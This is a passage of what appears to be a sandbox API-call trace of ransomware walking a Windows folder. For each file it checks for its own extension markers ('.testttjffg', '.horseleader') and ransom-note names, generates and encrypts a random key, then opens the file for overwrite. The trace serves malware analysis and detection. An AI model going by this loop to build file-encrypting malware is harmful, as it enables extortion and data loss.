Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.255] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.256] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: 
"c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.256] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="join.avi", cAlternateFileName="")) returned 1 [0230.256] lstrcmpiW (lpString1="join.avi", lpString2="Windows") returned -1 [0230.256] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 69 [0230.256] StrStrIW (lpFirst="join.avi", lpSrch=".horseleader") returned 0x0 [0230.256] lstrcmpW (lpString1="join.avi", lpString2="#Decrypt#.txt") returned 1 [0230.256] lstrcmpW (lpString1="join.avi", lpString2="_uninstalling_.png") returned 1 [0230.256] lstrlenW (lpString=".testttjffg") returned 11 [0230.256] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpSrch=".testttjffg") returned 0x0 [0230.256] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.256] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0230.257] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="Windows") returned -1 [0230.257] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 75 [0230.257] StrStrIW (lpFirst="micaut.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.257] lstrcmpW (lpString1="micaut.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.257] lstrcmpW (lpString1="micaut.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.257] lstrlenW (lpString=".testttjffg") returned 11 [0230.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.278] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0230.278] lstrcmpiW (lpString1="mip.exe.mui", lpString2="Windows") returned -1 [0230.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 72 [0230.278] StrStrIW (lpFirst="mip.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.278] lstrcmpW (lpString1="mip.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.278] lstrcmpW (lpString1="mip.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.278] lstrlenW (lpString=".testttjffg") returned 11 [0230.278] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.279] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0230.279] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="Windows") returned -1 [0230.279] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 78 [0230.279] StrStrIW (lpFirst="mshwLatin.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.279] lstrcmpW (lpString1="mshwLatin.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.279] lstrcmpW (lpString1="mshwLatin.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.279] lstrlenW (lpString=".testttjffg") returned 11 [0230.279] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.279] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.279] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.302] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca1847, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xf901a42, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xeca1847, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0230.302] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="Windows") returned -1 [0230.302] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 75 [0230.302] StrStrIW (lpFirst="rtscom.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.302] lstrcmpW (lpString1="rtscom.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.302] lstrcmpW (lpString1="rtscom.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.302] lstrlenW (lpString=".testttjffg") returned 11 [0230.302] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.302] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.303] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0230.303] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="Windows") returned -1 [0230.303] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 83 [0230.303] StrStrIW (lpFirst="ShapeCollector.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.303] lstrcmpW (lpString1="ShapeCollector.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.303] lstrcmpW (lpString1="ShapeCollector.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.303] lstrlenW (lpString=".testttjffg") returned 11 [0230.303] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.303] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: 
"c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.303] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="split.avi", cAlternateFileName="")) returned 1 [0230.303] lstrcmpiW (lpString1="split.avi", lpString2="Windows") returned -1 [0230.304] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 70 [0230.304] StrStrIW (lpFirst="split.avi", lpSrch=".horseleader") returned 0x0 [0230.304] lstrcmpW (lpString1="split.avi", lpString2="#Decrypt#.txt") returned 1 [0230.304] lstrcmpW (lpString1="split.avi", lpString2="_uninstalling_.png") returned 1 [0230.304] lstrlenW (lpString=".testttjffg") returned 11 [0230.304] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpSrch=".testttjffg") returned 0x0 [0230.304] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.304] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.304] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa23a9ac, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa23a9ac, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0230.304] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="Windows") returned -1 [0230.304] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 75 [0230.305] StrStrIW (lpFirst="tabskb.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.305] lstrcmpW (lpString1="tabskb.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.305] lstrcmpW (lpString1="tabskb.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.305] lstrlenW (lpString=".testttjffg") returned 11 [0230.305] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.305] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.305] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipBand.dll.mui", cAlternateFileName="")) returned 1 [0230.321] lstrcmpiW (lpString1="TipBand.dll.mui", lpString2="Windows") returned -1 [0230.321] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 76 [0230.321] StrStrIW (lpFirst="TipBand.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.321] lstrcmpW (lpString1="TipBand.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.321] lstrcmpW (lpString1="TipBand.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.321] lstrlenW (lpString=".testttjffg") returned 11 [0230.321] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.321] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.321] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.566] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0230.567] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="Windows") returned -1 [0230.567] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 75 [0230.567] StrStrIW (lpFirst="TipRes.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.567] lstrcmpW (lpString1="TipRes.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.567] lstrcmpW (lpString1="TipRes.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.567] lstrlenW (lpString=".testttjffg") returned 11 [0230.567] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.567] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.567] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.567] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cd75ed, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5f38bbd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5f38bbd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0230.569] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0230.569] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 76 [0230.569] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.569] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.569] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.569] lstrlenW (lpString=".testttjffg") returned 11 [0230.570] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.570] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.570] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.570] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0230.570] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="Windows") returned -1 [0230.570] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui") returned 75 [0230.570] StrStrIW (lpFirst="TipTsf.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.570] lstrcmpW (lpString1="TipTsf.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.570] lstrcmpW (lpString1="TipTsf.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.570] lstrlenW (lpString=".testttjffg") returned 11 [0230.571] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.571] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.571] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
